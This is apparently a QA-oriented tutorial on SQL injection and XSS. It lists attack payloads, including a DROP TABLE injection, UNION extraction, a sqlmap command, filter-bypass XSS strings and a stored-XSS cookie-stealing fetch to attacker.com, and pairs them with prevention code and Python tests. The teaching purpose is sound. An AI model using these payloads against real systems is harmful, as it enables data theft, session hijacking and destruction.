SQL Injection and Cross-Site Scripting (XSS) remain among the most critical web application vulnerabilities (as discussed in OWASP ZAP Automation: Security Scanning in CI/CD). Understanding how to detect, test, and prevent these attacks is essential for QA professionals working on security testing (as discussed in Penetration Testing Basics for QA Testers).

SQL Injection

Types of SQL Injection

1. Classic SQL Injection

-- Vulnerable code
SELECT * FROM users WHERE username = '$username' AND password = '$password'

-- Attack payload
username: admin' OR '1'='1
password: anything

-- Resulting query
SELECT * FROM users WHERE username = 'admin' OR '1'='1' AND password = 'anything'

2. Blind SQL Injection

-- Time-based blind injection
admin' AND SLEEP(5)--

-- Boolean-based blind injection
admin' AND 1=1--  (true condition)
admin' AND 1=2--  (false condition)

3. Union-Based Injection

-- Extract data from other tables
' UNION SELECT username, password FROM admin_users--

Testing for SQL Injection

Manual Testing Payloads:

' OR '1'='1
'; DROP TABLE users; --
' UNION SELECT NULL, NULL, NULL--
admin'--
' OR 1=1--

Automated Testing:

# SQLMap
sqlmap -u "http://example.com/login" --data="username=test&password=test" --batch

# OWASP ZAP (as discussed in [Security Testing for QA: A Practical Guide](/blog/security-testing-for-qa))
zap-cli quick-scan http://example.com

Prevention

# Bad: String concatenation
query = f"SELECT * FROM users WHERE id = {user_id}"

# Good: Parameterized queries
query = "SELECT * FROM users WHERE id = ?"
cursor.execute(query, (user_id,))

# Good: ORM usage
user = User.objects.get(id=user_id)
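The following is an added example, not code from the original post: it builds a constructed in-memory SQLite table and runs the page's own "Manual Testing Payloads" through a login written with string formatting (the Bad pattern above) and through one written with placeholders (the Good pattern above). The function names (`login_vulnerable`, `login_safe`, `bypass_report`) and the sample credentials are assumptions made for the demonstration. It shows why the classic payload returns the admin row without a password, and doubles as the kind of regression test a QA team can keep in the suite to confirm the parameterized version rejects every payload in the list.

```python
import sqlite3

# Payloads copied from the "Manual Testing Payloads" list above.
MANUAL_PAYLOADS = [
    "' OR '1'='1",
    "'; DROP TABLE users; --",
    "' UNION SELECT NULL, NULL, NULL--",
    "admin'--",
    "' OR 1=1--",
]


def make_db() -> sqlite3.Connection:
    """Constructed sample table; the usernames and passwords are made-up test data."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("admin", "sample-admin-pw"), ("alice", "sample-user-pw")],
    )
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """Bad: the f-string splices user input into the SQL text, so quotes and
    comment markers in the input change the query's structure."""
    query = (
        f"SELECT username FROM users WHERE username = '{username}' "
        f"AND password = '{password}'"
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn: sqlite3.Connection, username: str, password: str):
    """Good: placeholders; the driver passes the values separately from the
    statement, so a quote in the input is just data, never syntax."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(query, (username, password)).fetchone()
    return row[0] if row else None


def bypass_report(login_fn, conn: sqlite3.Connection) -> dict:
    """Map each payload to the login outcome: a username means the check was
    bypassed, None means it was rejected, 'error: ...' means the database
    refused the mangled statement (a symptom worth logging and alerting on)."""
    report = {}
    for payload in MANUAL_PAYLOADS:
        try:
            report[payload] = login_fn(conn, payload, "anything")
        except (sqlite3.Error, sqlite3.Warning) as exc:
            report[payload] = f"error: {type(exc).__name__}"
    return report


if __name__ == "__main__":
    db = make_db()
    # The page's classic example: password is never checked for the admin row.
    print("vulnerable:", login_vulnerable(db, "admin' OR '1'='1", "anything"))
    print("safe:      ", login_safe(db, "admin' OR '1'='1", "anything"))
    for name, fn in (("vulnerable", login_vulnerable), ("safe", login_safe)):
        for payload, outcome in bypass_report(fn, make_db()).items():
            print(f"{name:10} {payload!r:40} -> {outcome}")
```

Note the operator precedence in the classic case: `username = 'admin' OR '1'='1' AND password = 'anything'` is evaluated as `username = 'admin' OR ('1'='1' AND password = 'anything')`, which is why the admin row comes back regardless of the password. The parameterized login returns None for every payload because the whole string is compared against the `username` column as a value.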

Cross-Site Scripting (XSS)

Types of XSS

1. Reflected XSS

// URL: http://example.com/search?q=<script>alert('XSS')</script>

// Vulnerable code
<div>Search results for: <?php echo $_GET['q']; ?></div>

2. Stored XSS

// Malicious comment stored in database
<script>
  fetch('http://attacker.com/steal?cookie=' + document.cookie)
</script>

3. DOM-Based XSS

// Vulnerable code
document.getElementById('output').innerHTML = location.hash.substr(1);

// Attack URL
http://example.com/#<img src=x onerror=alert('XSS')>

Testing for XSS

Basic Payloads:

<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg/onload=alert('XSS')>
<iframe src="javascript:alert('XSS')">

Advanced Payloads:

// Bypass filters
<ScRiPt>alert('XSS')</ScRiPt>
<img src="x" onerror="eval(atob('YWxlcnQoJ1hTUycp'))">

// Event handlers
<div onmouseover="alert('XSS')">Hover me</div>
<body onload=alert('XSS')>

XSS Prevention

// Bad: Direct HTML insertion
element.innerHTML = userInput;

// Good: Text content
element.textContent = userInput;

// Good: Escaping
function escapeHtml(text) {
  const map = {
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#039;'
  };
  return text.replace(/[&<>"']/g, m => map[m]);
}

// Good: Content Security Policy (do not add 'unsafe-inline' to script-src: it re-enables
// inline scripts and defeats the protection; use a nonce or hash for legitimate inline code)
Content-Security-Policy: default-src 'self'; script-src 'self'
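The following is an added example, not code from the original post. It ports the page's `escapeHtml()` map to Python, renders the reflected-XSS search page from the "Reflected XSS" section both unencoded (the PHP `echo $_GET['q']` behaviour) and encoded, and then uses a small HTML-parser based checker to confirm that none of the payloads from "Testing for XSS" survive as script-capable markup once output encoding is applied. The names `escape_html`, `render_search_vulnerable`, `render_search_safe`, `safe_url` and `find_active_content` are assumptions for the demonstration; the `javascript:` URL check covers the iframe payload, which body-context escaping alone does not address.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Same five-character map as the page's escapeHtml(), so output is identical.
HTML_ESCAPE_MAP = {"&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#039;"}

# Payloads copied from the "Testing for XSS" section.
XSS_PAYLOADS = [
    "<script>alert('XSS')</script>",
    "<img src=x onerror=alert('XSS')>",
    "<svg/onload=alert('XSS')>",
    "<iframe src=\"javascript:alert('XSS')\">",
    "<ScRiPt>alert('XSS')</ScRiPt>",
    "<img src=\"x\" onerror=\"eval(atob('YWxlcnQoJ1hTUycp'))\">",
    "<div onmouseover=\"alert('XSS')\">Hover me</div>",
    "<body onload=alert('XSS')>",
]


def escape_html(text: str) -> str:
    """Encode for HTML body and quoted-attribute contexts (not JS or URL contexts)."""
    return "".join(HTML_ESCAPE_MAP.get(ch, ch) for ch in text)


def render_search_vulnerable(q: str) -> str:
    """Bad: mirrors `<?php echo $_GET['q']; ?>` with no encoding."""
    return f"<div>Search results for: {q}</div>"


def render_search_safe(q: str) -> str:
    """Good: the query string is encoded before it reaches the HTML."""
    return f"<div>Search results for: {escape_html(q)}</div>"


def safe_url(url: str) -> str:
    """For href/src attributes: allow only http(s) and relative URLs, then encode.
    Scheme filtering is what stops javascript: URLs; escaping alone would not."""
    scheme = urlparse(url.strip()).scheme.lower()
    if scheme not in ("", "http", "https"):
        return "#"  # hypothetical dead-link fallback
    return escape_html(url)


class ActiveContentFinder(HTMLParser):
    """Records constructs that can run script: <script>/<iframe> elements,
    on* event-handler attributes, and javascript: src/href values."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "iframe"):
            self.findings.append(f"<{tag}>")
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(f"{tag}@{name}")
            elif name in ("src", "href") and value and value.strip().lower().startswith("javascript:"):
                self.findings.append(f"{tag}@{name}=javascript:")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)


def find_active_content(markup: str) -> list:
    """Return the list of script-capable constructs found in a rendered fragment."""
    finder = ActiveContentFinder()
    finder.feed(markup)
    finder.close()
    return finder.findings


def xss_report(render_fn) -> dict:
    """Map each payload to the active constructs that survive rendering."""
    return {p: find_active_content(render_fn(p)) for p in XSS_PAYLOADS}


if __name__ == "__main__":
    for name, fn in (("vulnerable", render_search_vulnerable), ("safe", render_search_safe)):
        for payload, found in xss_report(fn).items():
            print(f"{name:10} {payload!r:60} -> {found}")
    print(safe_url("javascript:alert('XSS')"), safe_url("/search?q=test"))
```

The checker is a test aid, not a sanitizer: it parses the rendered HTML so the assertion is made on what the browser would see rather than on string matching against the raw payloads. The same escaping map is correct for the body and quoted-attribute contexts shown on this page; unquoted attributes, inline JavaScript and URL contexts each need their own encoding, which is why `safe_url` filters the scheme before escaping.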

Testing Tools

| Tool | Type | Best For |
|------|------|----------|
| SQLMap | SQL Injection | Automated SQLi detection |
| Burp Suite | Manual Testing | Intercepting and modifying requests |
| OWASP ZAP | Automated Scanner | General vulnerability scanning |
| XSStrike | XSS Testing | Advanced XSS detection |
| Acunetix | Commercial | Comprehensive scanning |

Conclusion

SQL Injection and XSS remain critical vulnerabilities that QA teams must actively test for. Use a combination of manual and automated testing, implement proper input validation and output encoding, and continuously monitor for new attack vectors.